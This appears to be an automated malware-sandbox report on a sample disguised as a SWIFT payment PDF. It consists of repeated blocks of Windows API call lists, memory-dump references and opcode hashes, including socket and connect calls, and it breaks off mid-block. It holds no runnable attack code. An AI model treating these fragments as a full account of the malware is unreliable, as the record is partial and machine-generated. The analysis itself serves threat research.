                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$EnableMessageSend$LongShow
                                                        • String ID:
                                                        • API String ID: 142311417-0
                                                        • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                        • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                        • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                        • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                        APIs
                                                        • _memset.LIBCMT ref: 0044955A
                                                          • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                        • _wcslen.LIBCMT ref: 004495C1
                                                        • _wcslen.LIBCMT ref: 004495CE
                                                        • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                        • String ID:
                                                        • API String ID: 1843234404-0
                                                        • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                        • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                        • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                        • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                        • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                        • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                        • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00445721
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                        • _wcslen.LIBCMT ref: 004457A3
                                                        • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                        • String ID:
                                                        • API String ID: 3087257052-0
                                                        • Opcode ID: f61113842298c0cde1a1613ac64a6c4e099ae1c11c4f0348d0c3726d9b46ef2e
                                                        • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                        • Opcode Fuzzy Hash: f61113842298c0cde1a1613ac64a6c4e099ae1c11c4f0348d0c3726d9b46ef2e
                                                        • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 00459DEF
                                                        • GetForegroundWindow.USER32 ref: 00459E07
                                                        • GetDC.USER32(00000000), ref: 00459E44
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                        • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                        • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                        • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                        APIs
                                                          • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                        • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                        • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                        • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                        • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 245547762-0
                                                        • Opcode ID: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                                                        • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                        • Opcode Fuzzy Hash: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                                                        • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00447151
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                        • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                        • BeginPath.GDI32(?), ref: 004471B7
                                                        • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Object$Select$BeginCreateDeletePath
                                                        • String ID:
                                                        • API String ID: 2338827641-0
                                                        • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                        • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                        • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                        • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                        APIs
                                                        • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                        • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                        • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                        • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                        APIs
                                                        • SendMessageW.USER32 ref: 0046FD00
                                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                        • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                        • DestroyIcon.USER32(?), ref: 0046FD58
                                                        • DestroyIcon.USER32(?), ref: 0046FD5F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyIcon
                                                        • String ID:
                                                        • API String ID: 3419509030-0
                                                        • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                        • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                        • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                        • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                        APIs
                                                        • __getptd.LIBCMT ref: 004175AE
                                                          • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                          • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                        • __amsg_exit.LIBCMT ref: 004175CE
                                                        • __lock.LIBCMT ref: 004175DE
                                                        • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                        • InterlockedIncrement.KERNEL32(02F52D08), ref: 00417626
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                        • String ID:
                                                        • API String ID: 4271482742-0
                                                        • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                        • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                        • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                        • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                        • DeleteObject.GDI32(?), ref: 0045564E
                                                        • DeleteObject.GDI32(?), ref: 0045565C
                                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteObjectWindow$Icon
                                                        • String ID:
                                                        • API String ID: 4023252218-0
                                                        • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                        • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                        • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                        • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                        • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                        • MessageBeep.USER32(00000000), ref: 0046036D
                                                        • KillTimer.USER32(?,0000040A), ref: 00460392
                                                        • EndDialog.USER32(?,00000001), ref: 004603AB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                        • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                        • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                        • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                        APIs
                                                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                        • DeleteObject.GDI32(?), ref: 0045564E
                                                        • DeleteObject.GDI32(?), ref: 0045565C
                                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                        • String ID:
                                                        • API String ID: 1489400265-0
                                                        • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                        • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                        • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                        • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                        APIs
                                                          • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                        • DeleteObject.GDI32(?), ref: 0045564E
                                                        • DeleteObject.GDI32(?), ref: 0045565C
                                                        • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                        • String ID:
                                                        • API String ID: 1042038666-0
                                                        • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                        • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                        • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                        • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                        • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                        • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                        • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                        APIs
                                                          • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                        • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                          • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                          • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                          • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                        • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                          • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                        • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                          • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                        • ExitThread.KERNEL32 ref: 0041410F
                                                        • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                        • __freefls@4.LIBCMT ref: 00414135
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                        • String ID:
                                                        • API String ID: 132634196-0
                                                        • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                        • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                        • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                        • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                        APIs
                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                          • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                        • __getptd_noexit.LIBCMT ref: 00415620
                                                        • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                        • __freeptd.LIBCMT ref: 0041563B
                                                        • ExitThread.KERNEL32 ref: 00415643
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
